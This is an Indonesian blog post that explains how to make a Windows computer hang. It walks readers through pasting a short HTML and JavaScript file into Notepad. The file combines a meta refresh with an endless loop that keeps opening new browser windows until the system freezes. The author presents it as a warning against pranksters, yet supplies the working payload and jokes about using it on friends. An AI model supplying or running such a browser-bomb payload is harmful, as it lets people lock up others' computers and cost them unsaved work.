MEMBUAT WINDOWS JADI BLANK

kali ini saya perkenal kan satu trik yang unik,yaitu membuat windows pada komputer kita jadi blank atau eror,tapi kenapa kok trik yg seharusnya tidak berguna kok saya share disini,jawab nya ini hanya untuk menambah wawasan saja siapa tau ada temen2 yg usil atau yg sengaja untuk mengerjai kita kan kita udah tau sebelum nya jadi kita ga jadi kena ulah usil mereka......


ters apa untung nya boss,biasanya kan ngasih trik itu yg bermanfaat....he2,kenapa kok ini malah merugikan,jawabanya kamu pikir sendiri n yg penting aku ngasih pengalaman saja......he2........
langsung aja ke poko permasalahan ya...ok,.........
caranya:
1,buka itu notoped,dah tau kan notoped???????yg ga tau ya tanya yg tau...gkgkkgkgkkkgkk,yg belum tau saya kasih tau buka itu start button trs buka all program cari di accesseries,,,nah disitulah kira2 letak notoped.
2.copas kode java scipt di bawah ini kedalalam notoped tersebut

<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=index.html">
<SCRIPT LANGUAGE="JavaScript">
<!--
for (x=0;x<1;x)
open("index.html");
</SCRIPT>
</HEAD>
</body>
</HTML>

3.kemudian simpan kode tersebut di notoped dan kasih nama( index.html)seperti yg di dalam kurung....
nah selesai deh....Nah, ketika file index.html tersebut dijalankan (di klik), maka komputer akan membuka banyak sekali jendela browser sampai tak terhingga banyaknya hingga windows hang atau sampai ga kuuuuuuuaaaaaattttttttttt........dan akhir nya klepek2 deh......kok bisa begitu ya??????ya bisa lah karena apa????/kamu harus tau,Instruksi dari javascript diatas adalah perintah untuk memanggil diri sendiri tanpa berhenti dengan sangat cepat.oooo begitu ya.....nah sekarang udah tau kan?????tapi jangan di gunakan untuk yg aneh2 ya.......ya kl ga percaya silakan di coba di komputer sendiri ya ,jangan di komputer temenya.....nanti bisa2 dapat hadiah kepalan tangan nanti.....he2,demikian lah trik dr saya semoga bermanfaat,banyak lah membaca n belajar kamu pasti akan jadi tau......salam sejah tera dari budywonk.







BACA JUGA YANG INI :

2 comments:

 
bila ada kejanggalan di blog ini,anda bisa tulis di komentar atau di catbox,jangan sungkan,blog ini di buat untuk persahabatan.maju terus bloger indonesia!!!